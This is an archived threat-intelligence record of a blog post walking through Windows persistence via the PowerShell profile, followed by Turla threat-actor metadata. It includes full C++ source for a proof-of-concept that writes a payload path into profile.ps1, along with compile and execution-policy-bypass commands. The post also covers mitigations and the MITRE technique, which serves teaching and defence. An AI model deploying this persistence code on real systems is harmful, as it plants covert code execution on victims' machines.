{
	"id": "d0d71c74-412e-4f4f-85bc-253caa38bfaf",
	"created_at": "2026-04-06T00:15:18.11881Z",
	"updated_at": "2026-04-10T13:11:22.108361Z",
	"deleted_at": null,
	"sha1_hash": "0d969a05942fd365a42743393f658a8804bab908",
	"title": "Malware development: persistence - part 11. Powershell profile. Simple C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1331312,
	"plain_text": "Malware development: persistence - part 11. Powershell profile.\r\nSimple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-09-20 · Archived: 2026-04-05 21:59:27 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the result of my own research into one of the interesting malware persistence tricks: via PowerShell profile.\r\npowershell profile\r\nA PowerShell profile is a PowerShell script that allows system administrators and end users to configure their environment and perform specified commands when a Windows PowerShell session begins.\r\nThe PowerShell profile script is stored in the folder WindowsPowerShell:\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 1 of 14\r\nLet’s add the following code to the current user’s profile file; it will be executed whenever the infected user opens a PowerShell console:\r\nZ:\\2022-09-20-malware-pers-11\\hack.exe\r\nI will demonstrate everything with a practical example and you will understand everything.\r\npractical example\r\nFirstly, create our “malicious” file:\r\n/*\r\nhack.cpp\r\nevil app for windows\r\npersistence via powershell profile\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBox(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nAs usual, it is just a “meow-meow” messagebox.\r\nCompile it:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nAnd we can run it on the victim machine to check correctness:\r\nThen we do this simple “trick”:\r\necho Z:\\2022-09-20-malware-pers-11\\hack.exe \u003e \"%HOMEPATH%\\Documents\\windowspowershell\\profile.ps1\"\r\nAnd finally, run powershell:\r\npowershell -executionpolicy bypass\r\nAs you can see, our malicious logic executed as expected and powershell is the parent process of our messagebox.\r\n=^..^=\r\nI created a simple PoC code to automate this process:\r\n/*\r\npers.cpp\r\nwindows persistence via Powershell profile\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003cstrsafe.h\u003e\r\n#include \u003ciostream\u003e\r\nint main(int argc, char* argv[]) {\r\n char path[MAX_PATH];\r\n char *homepath = getenv(\"USERPROFILE\");\r\n char pspath[] = \"\\\\Documents\\\\windowspowershell\";\r\n char psprofile[] = \"\\\\profile.ps1\";\r\n char evil[] = \"Z:\\\\2022-09-20-malware-pers-11\\\\hack.exe\";\r\n DWORD evilLen = (DWORD)strlen(evil);\r\n StringCchCopy(path, MAX_PATH, homepath);\r\n StringCchCat(path, MAX_PATH, pspath);\r\n BOOL wd = CreateDirectoryA(path, NULL);\r\n if (wd == FALSE) {\r\n printf(\"unable to create dir: %s\\n\", path);\r\n } else {\r\n printf(\"successfully create dir: %s\\n\", path);\r\n }\r\n StringCchCat(path, MAX_PATH, psprofile);\r\n HANDLE hf = CreateFile(\r\n path,\r\n GENERIC_WRITE,\r\n 0,\r\n NULL,\r\n CREATE_NEW,\r\n FILE_ATTRIBUTE_NORMAL,\r\n NULL\r\n );\r\n if (hf == INVALID_HANDLE_VALUE) {\r\n printf(\"unable to create file: %s\\n\", path);\r\n } else {\r\n printf(\"successfully create file: %s\\n\", path);\r\n }\r\n BOOL wf = WriteFile(hf, evil, evilLen, NULL, NULL);\r\n if (wf == FALSE) {\r\n printf(\"unable to write to file %s\\n\", path);\r\n } else {\r\n printf(\"successfully write to file evil path: %s\\n\", evil);\r\n }\r\n CloseHandle(hf);\r\n return 0;\r\n}\r\nThe logic is simple: this program just creates the profile folder if it does not exist, then creates the profile file and writes to it.\r\ndemo\r\nLet’s see everything in action. Compile our PoC:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nAnd run it on the victim’s machine:\r\n.\\pers.exe\r\nAnd when a powershell session is started:\r\nIf we check it via Process Hacker:\r\npowershell.exe is the parent process again, as expected.\r\nAs you can see, everything worked perfectly! =^..^=\r\nBut there is a caveat. If powershell is run without execution policy bypass mode, this persistence trick did not work in my case:\r\nAlso there are four places you can abuse the powershell profile, depending on the privileges you have:\r\n$PROFILE | select *\r\nBy storing arbitrary instructions in the profile script, PowerShell profiles present several chances for code execution. To avoid relying on the user to start PowerShell, you may use a scheduled job that executes PowerShell at a certain time.\r\nmitigations\r\nEnforce execution of only signed PowerShell scripts. Sign profiles to prevent them from being modified. You can also avoid loading PowerShell profiles if they are not needed, for example via the -NoProfile flag.\r\nThis persistence trick is used by Turla in the wild.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers’ arsenal.\r\nMicrosoft PowerShell profiles\r\nMITRE ATT\u0026CK. Event Triggered Execution: PowerShell Profile\r\nTurla\r\nsource code on github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html"
	],
	"report_names": [
		"malware-pers-11.html"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434518,
	"ts_updated_at": 1775826682,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0d969a05942fd365a42743393f658a8804bab908.pdf",
		"text": "https://archive.orkl.eu/0d969a05942fd365a42743393f658a8804bab908.txt",
		"img": "https://archive.orkl.eu/0d969a05942fd365a42743393f658a8804bab908.jpg"
	}
}